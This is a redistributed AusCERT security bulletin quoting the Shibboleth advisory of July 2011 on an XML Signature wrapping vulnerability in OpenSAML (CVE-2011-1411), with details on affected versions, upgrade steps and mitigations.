Protect yourself against future threats.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2011.0765 Shibboleth Security Advisory [25 July 2011] 26 July 2011 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Shibboleth Publisher: Shibboleth Operating System: Windows UNIX variants (UNIX, Linux, OSX) Impact/Access: Unauthorised Access -- Remote/Unauthenticated Resolution: Patch/Upgrade CVE Names: CVE-2011-1411 - --------------------------BEGIN INCLUDED TEXT-------------------- - -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Shibboleth Security Advisory [25 July 2011] Updated versions of the Shibboleth Project's OpenSAML software in Java and C++ are available which correct a security issue. This general issue affects BOTH Identity and Service Provider deployments, so a single advisory is being issued for both. For the Identity Provider, this issue is rated as "important". An unauthenticated remote attacker could leverage the flaw to obtain unauthorized access to user data under certain circumstances. For the Service Provider, this issue is rated as "critical", and allows an unauthenticated remote attacker to access protected resources. Deployers should take immediate steps as outlined in this advisory and apply the relevant update(s) at the soonest possible moment. OpenSAML software is vulnerable to XML Signature wrapping attacks ======================================================================= The Shibboleth software relies on the OpenSAML libraries to perform verification of signed XML messages such as attribute queries or SAML assertions. Both the Java and C++ versions are vulnerable to a so-called "wrapping attack" that allows a remote, unauthenticated attacker to craft specially formed messages that can be successfully verified, but contain arbitrary content. Identity Provider Vulnerability - - ------------------------------- The Identity Provider software relies on the Java version of OpenSAML and is vulnerable to attacks when XML message signing is used in place of TLS client authentication for requests such as attribute queries or SAML artifact resolution. It is also vulnerable to attacks involving signed AuthnRequest messages, but these are not critical in most deployments. Some vulnerabilities also exist with use of the extension that supports delegation of user access, which is not included with the core software, but available as an add-on. All versions of the Identity Provider software prior to V2.3.2 ship with a version of OpenSAML containing the vulnerability. Some mitigation for these attacks is possible by disabling support for accepting signed messages. See below for information on this option. Identity Provider Recommendations - - --------------------------------- Upgrade to V2.3.2 of the Identity Provider software to obtain the corrected version of OpenSAML (V2.5.1), per the normal upgrade process: https://wiki.shibboleth.net/confluence/display/SHIB2/IdP2Upgrade If you cannot upgrade immediately, you may mitigate the attack by disabling support for message signing in the security policies defined near the bottom of "relying-party.xml" by commenting out all <security:Rule> elements with xsi:type="samlsec:ProtocolWithXMLSignature" and restarting your Java container. Service Provider Vulnerability - - ------------------------------ The Service Provider software relies on the C++ version of OpenSAML and is vulnerable to attacks when handling authentication responses from IdPs. This allows an attacker to subvert the security of the system and supply an unauthenticated login identity and data under the guise of a trusted issuer. All versions of the OpenSAML library prior to V2.4.3 contain this vulnerability. Note that this refers to the OpenSAML version, *not* the Shibboleth version. To determine the version you're using: - - - Windows: check the DLL version for saml2_4.dll in your installation's lib folder (anything older than saml2_4 is obviously too old) - - - Linux/RPM: Check the package version using "rpm -qa | grep saml" - - - Macport: Use the "port installed" command Do not rely on log files for version determination, as this can be inaccurate and may refer to the version against which the software was compiled. There are no known mitigations to prevent this attack apart from applying this update. Deployers should take immediate steps, and may wish to disable the use of the SP until the upgrade is done. Service Provider Recommendations - - -------------------------------- Upgrade to V2.4.3 or later of the OpenSAML library and restart the shibd service/daemon. Sites relying on official RPM packages or Macports can update via the yum and port commands respectively, but should manually restart shibd. The updated library has been built into the Windows installation kits for V2.4.3 of the SP software, and can be found in the "postinstall" ZIP kits provided for SP update. *Any* version of the SP since 2.0 can be safely upgraded by unpacking the latest postinstall ZIP over top of the original software. One exception to this: Windows 2000, which has not been supported since V2.4 was released. Note that older Windows installs may not have the latest Microsoft C/C++ runtime libraries present. Installation kits for both 32-bit and 64-bit runtimes can be found here: http://shibboleth.net/downloads/service-provider/msredist/ For those using platforms unsupported by the project team directly, refer to your vendor or package source directly for information on obtaining the fixed version. If the update from your vendor lags, you should consider building opensaml from source for your own use as an interim step. Credits - - ------- Juraj Somorovsky, Andreas Mayer, Meiko Jensen, Florian Kohlar, Marco Kampmann, Jörg Schwenk Horst Görtz Institute for IT Security, Ruhr-University Bochum Thanks to Juraj Somorovsky for working with the developers to explore and address this issue. URL for this Security Advisory: http://shibboleth.internet2.edu/secadv/secadv_20110725.txt The OpenSAML portion of this advisory has been assigned CVE-2011-1411 by the National Vulnerability Database. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1411 - -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (Darwin) iEYEAREKAAYFAk4s3dkACgkQpXtW80eQXRVTsACeOQckY5CpcHFtKj7wMzAbNRfY S8EAoLN4EFztTdYMjmnI9yxdGILMu5v3 =J9lb - -----END PGP SIGNATURE----- - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: http://www.auscert.org.au/render.html?cid=1980 =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBTi32v+4yVqjM2NGpAQICDhAAsNPCM3G4Dd5ZQhHfC9dZYYbbCJJxtCMh WQoHiTQzwa/79mNmeWOaXyklcX45ZYbXP9AMkpSp/Vnik2nQ4SCWp0xcN84W1qWV 75R1cu2rO0sivBJTwwYG/KbQscNV6mRRgqXANMJAGIPrOQtAJKrWtOTvTjT4gwQY 5TFXbyIxkaXd54bUrb4yXBufv7l5lfv/Q07zFwYM9Bv0cg/DkeqnzxB7Nay+WSkS ex+smHVKTvrdrVveqcCwoE8IIA2jLmxENlj5mkMPWpnA3MnTRzdNAFfeYkJnoKo2 ZCM1ekLjJkUsYBtBiwkHdR5NVJVk1nt3Md8kn8rPoF3w99hqtzpU5rVyirB0mBRz DG/Xu6At8K5pyea36OygR9R4Xl6uT4/CsRFXEo2vkG8TOqEYVhpPhURTWmQ/TSZ8 kK4nd64Y5LZ4V0BsyhiL0065mfsagujngl9vdkfTFmJi2PgJjqXWHAb+LZ9hmQ73 YOF69xPry5TQPgiREgnTeRPX8wS/pKw7iKGwBw0sttQuG4LJBmlWgd5UnTLkiQtH RrrqDNiTnjmgQKeHnrQgxi/EE0aJRyyxeCt5lwbMKKS8HYIVe4lO08YRM+VcVRk7 I1fF8RdsW8Zu+s0/kd0M+YTe1WT/MWTf/6MxoiYv2Y4aorZKaxZAeuYv8iAqOeyH +CAFL6vlvng= =RxmJ -----END PGP SIGNATURE-----